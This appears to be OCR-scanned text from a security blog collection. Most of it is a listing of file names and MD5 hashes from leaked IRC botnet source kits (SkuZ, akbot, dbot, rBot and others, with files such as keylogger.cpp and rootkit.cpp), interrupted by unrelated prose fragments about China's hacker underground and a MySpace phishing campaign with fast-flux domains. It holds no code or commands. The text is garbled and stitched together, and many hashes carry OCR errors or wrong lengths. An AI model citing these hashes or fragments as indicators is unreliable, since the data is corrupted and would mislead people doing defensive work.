afacdd29d0807140el1bfb3a73c84be3a 
SkuZ.cpp eb81900c32074243faea4da4belabd8a 
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SkuZ.dsp 82cf9b1209015ab95b81b4011b75a49d 
SkuZ.dsw 671e479e4d691a572c5411228150eaf0 
SkuZ.exe €4764a7594668f222b75f5e8f50d60bc 
SkuZ.h 

259fla708e6a7a4c1b08013ba6429e3b 
SkuZ.ico 1b96dd21b39fa09e50b112d62231f346 
SkuZ.ncb 21601973713e610b7d20f13f5b5ec7f2 
SkuZ.opt 74177bbf8c08971ca2badc2ff560774a 
SkuZ.plg 837e0e€36947a063e292106751fb8421a 
SkuZ.rc 

d0a813f73e4b5094d47ee4aadafabla0 

Str.h 

ecc8006d35cbc96b72110f6F26d0b86c 

Sys.cpp 

17b3dfld9b9da842d5df86b20b58e9b9 

Sys.h 

9913a650e171cd2d9565cb968abce288 

Tcp.h 

fef2ec159176a6f0a031657a0a590757 

Test.cpp e2fflc9e0a2bf2b2b151a9f4a6204b62 
Test.h 

5b476d4efal78eab5661aa051f28582b 

Thr.cpp 

b755083e66e9a87bf7688bb8648b5761 

Thr.h 

54aff4176947dea5227d1bbe8364776a 
encrypt.exe 
7d400a514eebececabc78541fe5cb5e4 
SkuZ-BoT Commands.txt 
a8d199be9300d65f531c0e5088c1e8e4 
SkuZ.JPG d24cec5e9db8a7414804fefa2dec9637 
Asn.cpp 

4e747569a099e383e96efeblcffb200a 

Asn.h 

a86f2b484288aa0f479c22936a44dee8 
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Dcom.cpp 6af00dbdc37750d722db029c45d4002d 
Dcom.h 
4fa31a9619fa3a1376a68ed77d37c89F 
Dss.cpp 
4a21d0ae328802029b52a69b67b59709 
Dss.h 
f15666972fc5e723c8906ddd7abb350f 
Land.cpp 2ba3dc2b03914e270fc36b4f79733984 
Land.h 
d5a2a6a0d6427ff31feba3bd6b318260 
Lsass.cpp 
78cbb5a5dfb057ed4ca8b4eab413062b 
Lsass.h 
9d6ceb53687a7dd3b3bd3a3el10bd24ac 
Map.cpp 
6d6ddd315bb65964a83f87df5b4689ca 
Map.h 
a684c0a6c4671daec3d814a5c76d80df 
Masn.cpp 7ce8cf7bd64d7e8c44768213b09d0c95 
Masn.h 
4762527163cdd3430dff9a5flla4b62e 
Netbios.cpp 
a0cfe503d775b0878090c897c65155eb 
Netbios.h 
6felae320cd74ce4c5c413e2f021bfe7 
Pnp.cpp 
ee581b40ffd81lefccf45b0c084ef77a6 
Pnp.h 
1a3028857c9de01cfa3bebd09bf0cc09 
akbot.cpp 
f40ad1c6e4b6e9c82bcla9abe3ead69a 
akbot.dsp 
dac266447c1075eee47e277d845d5d53 
akbot.dsw 
a2c09382b3e5af3b4eb1f4ab221602a8 
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akbot.h 
2f4a2410aad69e9b1e50dd6ba767eb59 
akbot.ncb 
ed1a656bb185f36af076cdd7aalcl1f4f 
akbot.opt 
5384398917bdf466b76bbd6822aeb5e0 
akbot.plg 
4f1d113bc1208d8ab6b61cee802bc2c4 
asn.cpp 
95c0d426471ee9fb764d5f7411860ace 

asn.h 

85dfae25200796c8d08233677f29c49b 
cmds.txt c11bc55115565654a33e066b113f0c74 
config.h 63484bb970af17f15b79b7b6f2d8136f 
ddos.cpp 7dcfda24facb95ce00a308636e1b33ef 
ddos.h 

d9906ded19ad82025c6fd5040280376d 
download.cpp 
944f33df793fc5f970c8fbeceed0e965 
download.h 
4924f18c4d4352f82a5dfa39a7d135d4 

email.h 

12a7671fd89c87883120fa010697304c 
extern.h d2a79aacce96141b02db655c14al1f68e 
ftpd.cpp 51d3a4fbe7b97c9e7693bff2865adfel 
ftpd.h 

542c665451a06042b52d5bc400898893 
httpd.cpp 
9b386111a10634aaf9e79cce67b4d9a3 
httpd.h 

b649dfle36644eeedaaebaabeb046fab 
include.h 
6a2dfc027891040792c1a44de3f2338e 

ip.cpp 

lcad56delfe676c5da990be0167b25b5 
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colleagues by [4]localizing the most popular web malware exploitation kits such as Mpack and 
IcePack to Chinese, as well as benefiting from the proven capabilities of an [5]open source 
DDoS-centered malware by also [6]localizing it to Chinese and porting it to a Web interface. 
And so once they’ve localized the most effective attack approaches by making them even 
easier to use, the start adding new features and functionalities in between [7]coming up with 
[8]unique tools by themselves. 


The bottom line - China’s IT Underground is indirectly monitored and controlled by China’s 
Communist Party, with the big thinkers realizing the potential for asymmetric warfare domi- 
nance as the foundation for [9]economic espionage, and the largest [10]cyberwarriors buildup 
in the face of [11]people’s information warfare armies driven by [12]collectivism sentiments. 


Here’s [13]a very interesting article detailing some of perspectives of the China Eagle 
Union, the Hacker Union of China, and the Red Hacker’s Alliance : 


"The Chinese red hackers have their own organizations and websites, such as the Hacker 
Union of China ([14]www.cnhonker.com/), the China Eagle Union ([15]www.chinaeagle.org/), 
and the Red Hacker’s Alliance ([16]www.redhacker.org). The Hacker Union of China (HUC) was 
founded on December 31, 2000, and is the largest and earliest hacker group in China. It had 
80,000 registered members at its peak, and reportedly has 20,000 members after regrouping 
in April 2005." 


. http: //honeyblog.org/archives/147-Technical-Report-Studying-Malicious-Websites-and-the-Underground-Econo 


. http: //honeyblog.org/junkyard/reports/www-china-TR.pdf 


. http: //ddanchev. blogspot .com/2007/09/diy-chinese-passwords-stealer.htm 


10. http: //ddanchev.blogspot .com/2006/09/chinese-hackers-attacking-us .htm 


ttp://ddanchev. blogspot .com/2007/09/chinas- cyber-espionage-ambitions.htm 
11. http://ddanchev.blogspot.com/2007/10/peoples-information-warfare-concept .htm 
12. http://en.wikipedia. org/wiki/Collectivis 

http: //www.cnhonker.com 

http: //www.chinaeagle.org 


13. http: //www.chinamemo.org/chinascope/magazine/200505/3 


ip.h 
6c6c30d036614da833f2704921cbelae 
irc.cpp 
ee2eabbd6b1bflad7623dd4c174e1481 
irc.h 
d50b796392ebea8e5d4ff0cf5d7a3068 


misc.cpp 6783a07fc9de77973827ec47eb915c30 


mkcfg.exe 
8546a9ed3c8e81b250b8fb1a982638e5 
netapi.cpp 
0e0a55f5d39f72feb7ff9b76e1c5939d 


netapi.h 70dcc15466b7de69d76771ee3396118d 


process.cpp 
8ce9627404db09a7c5bd66b10c3f72F4 
process.h 
8525efdf793a0981a41e576caalb505e 
pscan.cpp 
7c2fc6583f159be0ec99c92f8578024d 

pscan.h 

7023739a4fa2ca4b939cfe41520c4e88 
scanner.cpp 
76a278944b0a15648b3b656e8fdfdéda 
scanner.h 
€889c413c8108bbff33d4c23da2c2713 
socks4.cpp 
eb18202bdf50e43e8a6b34571a7d3925 
socks4.h d0f62f03890d9003af9cc74686a29452 
tftp.cpp 2c97ed2752bca8fc52e489510d6b437b 
thread.cpp 
616d3fe7fe03adldca9cd69da6dcald5 
thread.h 9320ee23aecdde3f40d73bef2c80adf3 
akbot.cpp 
d46be21b1789364217529aa06b19dca8 
akbot.dsp 
18e050a44e4042485eadc8c87e5e245e 
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akbot.dsw 
070ad2277e7f342300490df5765e6446 
akbot.h 
f8cd612246d5ed834d95c6081a1a17f0 
akbot.ncb 
4d0601b3f3431224a63b69b3ac7b80cb 
akbot.opt 
44496117ab06afee49c508360f2adf41 
akbot.plg 
e2bf3476df5fa9e11a06d7a6c116e7a7 

asn.cpp 
3299ab5cdf18b37a6c251a09b4082a0d 

asn.h 

f26164ff72714f84335c3c78c0419e08 

config.h 74f987c77a9c3917eb0786f762cc7c34 
config.txt 
Odfbba54148de95457f7a94d22951d87 
ConfigGUI.exe 
d37e04456d860d7bac747943a88e1129 
dnssrv.cpp 
5eb858718c413054c234947e35876fc6 
dnssrv.h adf7096d28c63ce330ad04a83097790a 
download.cpp 
a014193df51689355b31b69ael2e6cac 
download.h 
cfdfe69ef175614e24bb0d728ff66766 

extern.h e313acc0f0483e53b2ac763a99379509 
external _ip.cpp 
daa4da7553fe8508b75de72757bdafde 
fake-httpder.cpp 
43cdfb260bf3045822c0c9651ef0656e 
ftpd.cpp e944d2161465905fd04ec50c00ecd612 
ftpd.h 

86ffc54c7130e971c4cfd46fde5a3b54 


fwbypass.cpp 
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dd2965cd1b21100f07b9ea9533e4ca97 
fwbypass.h 
80304e4f02d60ed8dd09527800a09430 
httpd-exploiter.cpp 
1399c0c4aac3b432f237599e6eccc65c 
httpd.h 
c972f0b1dc3145dd411d52436a79da50 
include.h 
297bdee61fd8ee65beb7219755cf5bba 
ip.cpp 
1cad56delfe676c5da990be0167b25b5 
ip.h 
6c6c30d036614da833f2704921cbelae 
ipswitch.cpp 
61dea5ad8ee91f7674ec7fe57279ff29 
irc.cpp 
1327b151la4abf6éb9e5fb37ad0b038c81 
irc.h 
5bf5dfa582c8599e917347f5eff9f041 
netapi.cpp 
O0c5f0876f2ae0131dae5730fa81ledc37 
netapi.h 2121d8b217b6bc6d7788553ea79c9a86 
process.cpp 
5689e7393fdfaeeb59bbc3310c2296a4 
process.h 
22c13cbc884c6e12c2002eb294601625 
readme.html 
d5778375e5216ed16f908b2b382d2f6c 
scanner.cpp 
d1dbef2b85431378575eb249028cdfee 
scanner.h 
13b8d79b9860a045523fa0719589d804 
thread.cpp 
73c96d0744e7d6e8c046f374c0101419 
thread.h 1lce8e7879da8ade2dd864e8b31a61cf9 
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Yeni Metin Belgesi.txt 
65afd33398f13b65e22a81bc5185f631 
akbot.cpp 
2beleec33ae58fd63497de9b0abcefc9 
akbot.dsp 
9bbc7259b4f1b291e443a11c0c2d0782 
akbot.dsw 
070ad2277e7f342300490df5765e6446 
akbot.h 
dd1501521c18cfeeac9b774116679f73 
akbot.ncb 
6c5e971bd2b1857751134e0be8da0bf4 
akbot.opt 
42c6a531f26e53064f41744021cd124f 
akbot.plg 
47be180f62034afce32a48b297526f58 
asn.cpp 
3299ab5cdf18b37a6c251a09b4082a0d 
asn.h 
206b6d44a2420ccb67c06d041e88112b 
changes.txt 
94657ac3f7d6811e592979eabe792cbe 
ConfigGUI.exe 
d37e04456d860d7bac747943a88e1129 
download.cpp 
a014193df51689355b31b69ael2e6cac 
download.h 
cfdfe69ef175614e24bb0d728ff66766 
Ehttp.cpp 
7fe€3295850f6b67417702d31d13bf808 
ehttp.h 
b649dfle36644eeedaaebaabeb046fab 
exploits.cpp 
a2a99b7f785d4c37f127b3ec7492485d 


extern.h 0ebe3352457ff54a312557b73d069c7a 
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ftpd.cpp e944d2161465905fd04ec50c00ecd612 
ftpd.h 
86ffc54c7130e971c4cfd46fde5a3b54 
include.h 
ca633ebc4ed77816caa5bbcac5ef2d64 
ip.cpp 
1cad56del1fe676c5da990be0167b25b5 
ip.h 
6c6c30d036614da833f2704921cbelae 
ipswitch.cpp 
61dea5ad8ee91f7674ec7fe57279ff29 
irc.cpp 
da59865941a4c39cde865fa32d334de2 
irc.h 
5bf5dfa582c8599e917347f5eff9f041 
mssql3mod.cpp 
9ea3ed5fe2ef93fdcb1176c05cOb1baf 
netapi.cpp 
fb443f28f871e7a3ba9aa3135d05cd16 
netapi.h 2121d8b217b6bc6d7788553ea79c9a86 
process.cpp 
5689e7393fdfaeeb59bbc3310c2296a4 
process.h 
22c13cbc884c6e12c2002eb294601625 
readme.html 
d5778375e5216ed16f908b2b382d2f6c 
scanner.cpp 
080ee7e1c082e4e720a2b799ac0dcb54 
scanner.h 
13b8d79b9860a045523fa0719589d804 
thread.cpp 
06312d19ab623ce0d7357df29edb6bb6 
thread.h 1lce8e7879da8ade2dd864e8b31ab61cf9 
akbot.cpp 
15a35d6d8a7e7d6f78e472c114dade43 
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akbot.dsp 
1fb99e481b68bc3e7412b7b42cedfic9 
akbot.dsw 
070ad2277e7f342300490df5765e6446 
akbot.h 
f8cd612246d5ed834d95c6081al1a17f0 
akbot.opt 
695061c0fa7ebc22b6640d3fdcbf2b49 
changes.txt 
27085046df484d3d2716028043efdcd9 
config.h 

ConfigGUI.exe 
d37e04456d860d7bac747943a88e1129 
dnsserv.cpp 
26c6258026ac8e0b583d4859cb7e02af 
dnsserv.h 
55181d83ef181a476513aeddfl1fd2f37 
download.cpp 
a014193df51689355b31b69ael2e6cac 
download.h 
cfdfe69ef175614e24bb0d728ff66766 
extern.h c58ab6abe139f83b46b915960323815b 
ftpd.cpp e944d2161465905fd04ec50c00ecd612 
ftpd.h 
86ffc54c7130e971c4cfd46fde5a3b54 
include.h 
f76e57cbcO1ldbd0a6ff5df9a4194e1 6f 
ip.cpp 
lcad56delfe676c5da990be0167b25b5 
ip.h 
6c6c30d036614da833f2704921cbelae 
irc.cpp 
bee075bc2fdcabc935cfe0b9511fc895 
irc.h 
5bf5dfa582c8599e917347f5eff9f041 
12198 


process.cpp 
5689e7393fdfaeeb59bbc3310c2296a4 
process.h 
22c13cbc884c6e12c2002eb294601625 
readme.html 
d5778375e5216ed16f908b2b382d2f6c 
scanner.cpp 
a3905dff4671e0a9f69b34edc17ceb35 
scanner.h 
13b8d79b9860a045523fa0719589d804 
thread.cpp 
06312d19ab623ce0d7357df29edb6bb6 
thread.h 1lce8e7879da8ade2dd864e8b31a61cf9 
modHelpSystem.bas 
€81389a2ba83166d89b400e78485699a 
modLoadClass.bas 
6dd76017f069ba2b36a5a7c0b18572cc 
modPublic.bas 
ac96f4f2bc116d5e94eef99b734f4665 
clsBotCommands.cls 
0a39766fba2726f98d202b0bcfd20f51 
clsBotSettings.cls 
87bcce27a93b77bc4e4cb6c55cf2b2b1 
clsInfect.cls 
1lbd3ef02e3cd07797bda5f33177df74c 
clsKillProcess.cls 
9fd6e79f29ca93dfa8ba05d740de8e4f 
clsNetInfo.cls 
e2ec2fe94587bdf02a79278415cd8a42 
clsSocketControl.cls 
d39c70a49b85dfed7af8b00dc839a4c9 
CSyslInfo.cls 
9a4219ab1493765ae1b2210fc3298999 
advscan.cpp 


Oae5ccd6749cdfc0550d8989cal675a6 
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advscan.h 
d5bfa343e80c04d15d6d7b5e9ce92eef 
aliaslog.cpp 
df9b9daf2e682ae3444484b2d3b3ebfc 
aliaslog.h 
52307a78ef96b5920f5edc93785166c6 
autostart.cpp 
70bdd438884ef8a62bd24a7c416303f4 
autostart.h 
ce33622adfc7b6e1543361c2a206229f 
configs.h 
eac535fb38498799cb3ca68ac15c1436 
crc32.cpp 
3771c5b3f6992c43c0e12a57c41a727e 
crc32.h 
1cd0adeb14bdd0dcbc3fe66a5fe2fed9 
CYBER.cpp 
9ec047aae6a0b8619103c8bc199d0635 
CYBER.dsp 
77317bdd0f76163f777f0edde164c035 
CYBER.dsw 
1b2a710a559e02a0d0ce8d48503bd827 
CYBER.h 
c935ae68c419d33aeb15d8987cefd1c2 
CYBER.ncb 
9a06c98e819b0c70a51290e55fdfcb23 
CYBER.opt 
3716fb6738e33dd626b870ff9f04aldb 
ddos.cpp e683e0875lae9aebd305f81c5fdef3c9 
ddos.h 
b3d1a37538db741825844dfb3df4f7 2f 
defines.h 
533c18d0220af6305d6496d97f0a7b86 
download.cpp 
0b3716775e81c7c4722b7df4b42905e6 
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download.h 
772d831e6b39c79d829d9fc8cdb713a6 
driveinfo.cpp 
ea56449efe807e5992893c09dabf2f58 
driveinfo.h 
8f57049be20497bcab61df57618ba9cfe 
ehandler.cpp 
7f85493a9bae6ab2dad717786502328c 
ehandler.h 
3644e5ec559d2670426689d1c80b0509 
externs.h 
3d7d483c3d4d843c02e9dfa4aa89b113 
fphost.cpp 
3b4e036a97dfabcd636e63245831853a 
fphost.h 72b69b3d4234fcbc5da07695ae3483c1b 
ftpd.cpp c065b5a9638115729cc01613e48338c9 
ftpd.h 
48a891506c957340b207b627105d7bb4 
functions.h 
857cffa270a5d29bf318a821fedd8eb4 
globals.h 
65ad95c53b660b0fc4bad98f2d2d4b22 
icmpflood.cpp 
b1dc910c0e85700633527df68890ea6d 
icmpflood.h 
4462c6318220648820316848deb124fd 
includes.h 
98eb4d29f19ce691bc02belc2e16f653 
irc send.cpp 
6a084f0b44846cfbd50498b8b03687e3 
irc send.h 

30d0176a5e9b6e3e5al 9bfb1lfcda444c 
loaddlls.cpp 
058d75cece8af74242667bc7f8898928 
loaddlls.h 
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99a95f879fa446c82e20d5d386f449e7 
misc.cpp 4770444fdc75d9baac93b3bc29bfa51f 
misc.h 

f035c1642a8e3ff49ff19bb1be316333 

ms04 007 _asnl.cpp 
6992b8ea0cba8bef0d55bf7c8f7f9049 

ms04 _007 _asnl.h 
7cc16b1d71320ddbdedad981b0d08b55 
net.cpp 

796805f241fa8e4bb1fd57401ladde342 

net.h 

b1bb95c11a47aa666acd9a5929861726 
netapi.cpp 
c1l0ee0eb57c31b312221dddb6d042ccf 
netapi.h 76d9d327ae39c40301de1982da543922 
netutils.cpp 
7e€489ba43eb936795805df785b7a6b4f 
netutils.h 
ccbb3172d63a28dae5a98af36c27e354 
passwd.h 50376b2e162dae58e42d17e19b473c42 
pingudp.cpp 
e40aa2cc525d4c4f8db04b7bd44d4952 
pingudp.h 
b86f6921f7a720d6e7b204fbeb34e8d4 
processes.cpp 
ebb7480e8631779fc8d704442131f207 
processes.h 
85295356719df32d32f5ff152efee06b 

psniff.cpp 
0a8f99605f1a29fcef8c8469076d7dbb 

psniff.h 5eebe93de4e03bf0bb118e35997743a9 
random.cpp 
4f83bbb6667242b8faaffe715bb72e7e 
random.h 72101c961e86107d6d1d0e2b70fcelel 
readme.txt 
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3.12.7 Update on the MySpace Phishing Campaign (2007-12-11 04:19) 


1 Ll 
’ 
4 


7 
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It seems that the parties behind the [1]Large Scale MySpace Phishing Attack which | covered 
in a previous post, have recently changed the main login redirector from 319303.cn/login.php 
to z8atr.cn/login.php, and the attached z8atr.cn’s fast-flux can be greatly compared to that of 
[2]Storm Worm’s fast-flux networks in terms of its size. The updated campaign is also taking 
advantage of the following DNS servers : 


Name Server: ns1.4980603.com 
Name Server: ns2.4980603.com 
Name Server: ns3.4980603.com 
Name Server: ns4.4980603.com 


Here’s more coverage [3]courtesy of the ISC assessing a previous state of the campaign 
in the form of different domain names used : 
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27fd8ec7e9a411a42ec90043d8bcd6c6 
redirect.cpp 
bble5cef7883404ec1891ad98bfd36f0 
redirect.h 
9e5349d6d6944a179b9ca7a7d847c335 
rndnick.cpp 
df462adb4097caeee365d5d28a3b35ca 
rndnick.h 
f4740b2ba5c0199dcae5c221ece946f2 
scan.cpp f129b39779aa10239cb37d33eef03731 
scan.h 
6236be771c0c88df937f75845a064f12 
secure.cpp 
0b8ae103aa66809ee4b179d262eala4e 
secure.h 6109b4f6d2ab84f14ab47ab6247c8e82 
shellcode.cpp 
c21b907a56b1982db8f8f4b54d693f24 
shellcode.h 
cal14f267b73bc867b075ca56f524d52e 
synflood.cpp 
2273a4fff6la4a440fffb75bd446c953 
synflood.h 
78df095c5aa59a0bfaa783e6edd38d0d 
sysinfo.cpp 
17375b805605f717739a8085be3f21f3 
sysinfo.h 
38774eadb5ba365df293ba4a222c4163 
tcpip.h 
41b08a9fae20869c4eca0bae6dc2d971 
tftpd.cpp 
85f5bc13beba708305cdb23c5b303dd3 
tftpd.h 
01a889b931f69e44f3a9421e16c327bc 
threads.cpp 
cbe0ba8b50028430092c7f0e78841b71 
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threads.h 
80ebf64175548a694f7caab8al8cb4bc 
visit.cpp 
27fb4f513a944ba46a905c796bce0c81 

visit. 

766e4add98e2cb96bd37e87f4d9dfff9 
wildcard.cpp 
8785f287656995d8621d455ac7e04ab7 
wildcard.h 
64fa15a50564415d397166c3d0aec0a6 
botkiller.cpp 
03c6b85198decd1ff8ccd782a8b6acfd4 
botkiller.h 
a71e71de8fb056658439934327df0ed0 
config.h Odf05fefeOc9f7b8al106f5ee4e889390 
d3des.c 

56cfaa34c608a22f989d6f5ff707001le 

d3des.h 
df98a52277db93658e7384fa84740f24 
dbot.dsp 05e253aa592dea565d3c50e4dc0676ea 
dbot.dsw 31c4c6b800668d17339f7e4ba8fabfba 
dbot.ncb 

dbot.opt 

96f3918f69a02662dfea4edfca55a2fd 

dbot.plg f86ea69767f36bc90729cOcd8be01f13 
downloader.cpp 
1b5e4alcd39a666dbe7d540dce583ede 
downloader.h 
4609446912718ffa6ac797869adfe8a2 
features.txt 
11a15el1fab4f33d2c9466848a006e45d 
ftpd.cpp 7ac45f048bd14f059ab2beb183875602 
ftpd.h 

96f2143059a249f4607d1878c7b69b7c 
include.h 
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€88259682ac554aeb049cc87dc8f6a18 
main.cpp 73675a957de00a5ba95707b9d02b8069 
main.h 
594d1bfa45674a39043c87b80b009f4b 
manuals.txt 
fb729b59665c3170d0cf0c21a92af30d 
md5.cpp 
1f257ec36f26698151ef6bc737205d42 
md5.h 
6960e98abd60b3ec4381b6f6a207e60b 
MD5ChecksumtTest.exe 
3a83507faf3e5503ce01lc6ba85eeal2a 
misc.cpp 76711d6a58e09e3c70387c0c1f8a4b5e 
misc.h 
Oelffc66441e6b3bd069ddlebea34ble 
patcher.cpp 
fd3ebd1893968f9f3ed000ff604cff03 
patcher.h 
70e1a30467b0f3b69ebe4661b518cfce 
qvncpass.cpp 
al0f3df60463544f65bd9f2fc3a79f3b 
qvncpass.h 
99c77c9c8ac1c92eb502161ad92cde91 
rfb.h 
fa322b6a29c2080dd3dbe97023bb0dd6 
scanner.cpp 
46016f233f5ff3c26a30276639b7cdb4 
scanner.h 
Oafl8bfal27bdd849138f5c274ae1844 
strings.cfg 
dd3a30c263f64f5a9ddf7c87fld25bf4 
strings.h 
582ef5dd0f94ced2e91a4fa09051a139 
tcpip.h 
3464effd01374f2732b9c95252af9740 
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version.c 
b0657cf0ed18b1d48316033c1c60cc2e 
version.h 

b0Ofe7fb5cfbe5b92fad9716a94091fe 
vncps.cpp 
dff3f74e9f1a3a01a243c6e2644098af 

vncps.h 

99bec3c207a21162b93169b0670f7d85 

xor.exe 

dfa50a93b616ele3ald2aac093ea853c 
1.READMEFIRST.CHANGES.AND.STUFF.txt 
f5c47d14386b27dcae8b98608b7159a2 
botkiller.cpp 
868770e6326457548224faab3b5e178e 
botkiller.h 
a71e71de8fb056658439934327df0ed0 

config.h 25df01124fdaa78fc74f810685fd6bba 
d3des.c 

56cfaa34c608a22f989d6f5ff707001le 

d3des.h 

df98a52277db93658e7384fa84740f24 
dbot.dsp 9734e3ffb8fbf79725f699f7bc137c8a 
dbot.dsw 31c4c6b800668d17339f7e4ba8fabfba 
dbot.ncb 54ca4ac67801af787fe3e258633dd19b 
dbot.opt d1224f9890c0483e81b38db80531e9a2 
dbot.plg 2944d689c2d76f2fa480ada519a53fc7 
downloader.cpp 
7c2d70ff0eale2858ceef4c623e55242 
downloader.h 
4609446912718ffa6ac797869adfe8a2 
features.txt 
11a15el1fab4f33d2c9466848a006e45d 
ftpd.cpp 7ac45f048bd14f059ab2beb183875602 
ftpd.h 

96f2143059a249f4607d1878c7b69b7c 
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include.h 
61d223b91c96546111486a8d4cd7f662 
main.cpp 8781de11e28e7351330032a5ff192e4b 
main.h 
594d1bfa45674a39043c87b80b009f4b 
manuals.txt 
fb729b59665c3170d0cf0c21a92af30d 
md5.cpp 
1f257ec36f26698151ef6bc737205d42 
md5.h 
6960e98abd60b3ec4381b6f6a207e60b 
MD5ChecksumtTest.exe 
3a83507faf3e5503ce01lc6ba85eeal2a 
misc.cpp d94d1bf054f578c3996ac05c85f08bdc 
misc.h 
Oelffc66441e6b3bd069ddlebea34ble 
netapi.cpp 
2ab50a25560fd8eb0892426f58f31813 
netapi.h 60b1ffd549f975d392e2f9a2f4f4c3d5 
patcher.cpp 
fd3ebd1893968f9f3ed000ff604cff03 
patcher.h 
70e1a30467b0f3b69ebe4661b518cfce 
qvncpass.cpp 
al10f3df60463544f65bd9f2fc3a79f3b 
qvncpass.h 
99c77c9c8ac1c92eb502161ad92cde91 
res.rc 
d7b0db3da7215102b83c63d712657070 
rfb.h 
fa322b6a29c2080dd3dbe97023bb0dd6 
scanner.cpp 
ed5f0a804d62b378a9dc620832628950 
scanner.h 
c6a27c034250817a303519cc213f40db 


12207 


strings.cfg 
56bf579fc2820d818750118e79c97646 
strings.h 
582ef5dd0f94ced2e91a4fa09051a139 
stringsbckup.txt 
582ef5dd0f94ced2e91a4fa09051a139 
tcpip.h 
3464effd01374f2732b9c95252af9740 
version.c 
b0657cf0ed18b1d48316033c1c60cc2e 
version.h 
b0Ofe7fb5cfbe5b92fad9716a94091fe 
vncps.cpp 
2¢73b41f0a58faa705e3886a721a2b94 
vncps.h 
99bec3c207a21162b93169b0670f7d85 
xor.exe 
dfa50a93b616e1le3a1d2aac093ea853c 
ABCDEFGH.JKL 

rBot.pdb 
45831b2ea469aa9741ladfbe92c7f5752 
autorun.h 
da11029b6al1f272fa82c2a664116d28c 
base64.h f4ab2230e7464bb7189040b9b176fa01 
bindshell.h 
d3aca251bb35766a6f15a73f979833dd 
ddos.h 
dbb3fb4ed0237672e46e8f9e1d839729 
download.h 
33a6bd53d353b0b13985c85d9e413c91 
find _proc.h 
3a5a0e56fa722c9f62fa6aab6cal19453d 
icmp.h 
719f85ea4b64eb3869e0db668aab4ca7 
igmp.h 
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36afc2193dfb9fe7b546a69e3598cd32 

inject.h 517calc8cab811lee4aa864cd2c49d4b4 
killer 5f27acd7e351dfb1a94282408962627d 
main.cpp 05181d2fb5b69b6c4ce891190aa270e8 
net.h 

afe28d534b055770c9c005be082ce24d 

priv.h 

c0b15da7b6408c31ab628699b3142e3a 
socks4.h 60265b574efc49bd31dc7cbb1796c10c 
spazm.aps 
9a37132faee910754c198cffef0a89fe 
spazm.ncb 
a5e97d1739f870dc564972b1lalcf5a63 
spazm.sin 
0ald2f83d030fce154f8304855f97069 
spazm.suo 
4067bc809737e4709a794e82dedd10af 
spazm.vcproj 
fd50e4e9a5ac275c34f5f614bc 742913 

sys _info.h 
5e92d50b364fd01d4db8fa8284c68c6b 

udp.h 

a20cbb1le3a6ec016d14517694ee230b0 
update.h ca00ac5fb8550181c19f0f3e7f85b87c 
_About.txt 
f90a46e19b75e4043042c588800f1cb7 
_config.h 
9bcf9e11b14f651bb513b1a99291319c 
create.h 08c3ec5079efa73794bdfe5b6b8a5c9e 
file.h 

24273b62d8f8f7298c8b9ddce2161919 
firewall.h 
4cf47e834eala83bdfd7d76804b02a88 
process.h 
8a578ae2d8d64042c3c0a6d31belf465 
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outlook _passwd.h 
c998a58ffc5a910ce503b2e4f044clac 
rnd.h 
1¢c8375ddfa2c0d59e526bf01a226c71b 
smtp.h 
a61db4b81c9f92b38c5f0b4abac5de36 
sok.h 
3a30f1lcd0d27b31d4f0fb10e9a30aa98 
worm _email.h 
6bc5bc77a42a5f14261760151e311327 
worm _p2p.h 
14818a315005b0676086e58fd63fc7a6 
myshellcode.asm 
ce26d85257d8fa2c68a5ad6012ed010c 
Read Me.txt 
16d9490a78c2ddd51bfc351e66c797cc 
dopebot.dsp 
7f6cf081cc560e3c36e9f2c4d38a5a71 
dopebot.dsw 
209538f513d3b97468095b6e163c2565 
dopebot.ncb 
b50ac257aeb0d6880e3d03al2daefd22 
dopebot.opt 
ff47f8eff997931889327838b7ac41a4 
dopebot.plg 
1¢243a26943c82795b980cef8115742e 
EliRT _COFF.lib 
64a1a05dc8fe3706c2f8c97551442889 
stub.dat 50b5e88calcf4114fad4d29bef4309ee 
bot.cpp 
06f2d7be2166215ff93102ad2cf22ec2 
bot.h 
64602ef20050b4646cfb1cb66fd1la5a9 
btl.cpp 
1f149b692d48d61734f49f835330fd09 
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bt1.h 

cbbd3c86406232c3e263a891d2a8d9ef 

crypto.cpp 

446d184612468848d2709c4011140241 

crypto.h f330584ad87b350b006a0058a7b456fe 

download.cpp 

503079349a23494515bdd83ca328a3fa 

download.h 

20b3d816dcaa9896e1390cb69431525e 

EIiRT.h 

70e29701f86d5e715ba4f9fa961ddba8 

EliRT _COFF.lib 

64a1a05dc8fe3706c2f8c97551442889 

file.cpp 639580a89f3b66f028ae55b32579d74e 

file.h 

d0bc9710f93e50f588d4de07d809dd67 

fwb.cpp 

03a6be7444e4f6f3cbb07afbb2ea0cdd 

fwb.h 

567f8bb0e4799db4074e00c4a578169e 

injection.cpp 

895916b604951c0887c03432a5bd5d88 

injection.h 

02776e3107e7d4d628263a38c22f21ba 

install.cpp 

f388752bd1762316ea02f302c34d4c34 

install.h 

30c10ca9c8607ec462811246d7fcOff9 

keylogger.cpp 

60392e0dafeba8bcabf50ae1c605f729 

keylogger.h 

abaad0313c8148e9bcO0fbf3c506e06e6 

klgger.cpp 

fofdc2f32c40f2e31710761e1ad03112 

klgger.h e67f5f4450f864be734507388cdd97e4 
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melt.cpp a40f9548137863e0c72f414f9027a5ae 
melt.h 
b509b0a1c64856cda555821a962eb003 
misc.cpp d5be435e9e9624b0dbae247e432b784c 
misc.h 
f389604395dab7cec7c6004228d5847d 
netinfo.cpp 
27bae46f7e07456b904fd3df211bd84a 
netinfo.h 
d6c7073d300155225969c0d8229d424d 
process.cpp 
29fb0fbc6629b091elaabldb3cfbe80e 
process.h 
50eb038c8aa5264b3360d36c63d6b1f3 
registry.cpp 
b12b02caad757a720933ba008f6bcefc 
registry.h 
62170e5f0a5623daf58e392df0712435 
rootkit.cpp 
fOfccelbflf48afa4ede1277236845e2 

rootkit.h 
cfb12bfebb3d85f365d61e9d9d762679 
rt07.cpp d6bf797e7901c636fd88c9f32e9dff4c 
rt07.h 

222d66213286c6737decfd68930314c4 
scanner.cpp 
beabaf1737092b4a8f6ec151ffalelfd 
scanner.h 
4c0f3e93817a024f09f7d1396d51a3f2 
secure.cpp 
42319a60cbc4e7e24ff05d6d04ef236c 
secure.h 1681f8eea259999e664fe02d96fa4327 
service.cpp 
€8419c0941b89821a47f499e08dfde9b 


service.h 
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, 


Ww 


"Two primary infection vectors have been observed providing us with unique insight into the 
life cycle involved in propagating a fast flux service network. The attack vectors include: 
Compromised MySpace Member profiles redirecting to phishing sites; SWF Flash image ma- 
licious redirection to Phishing and drive-by browser exploit attempt. All Flash redirects were 
observed redirecting browsers. The successful compromise of a windows host via this exploit 
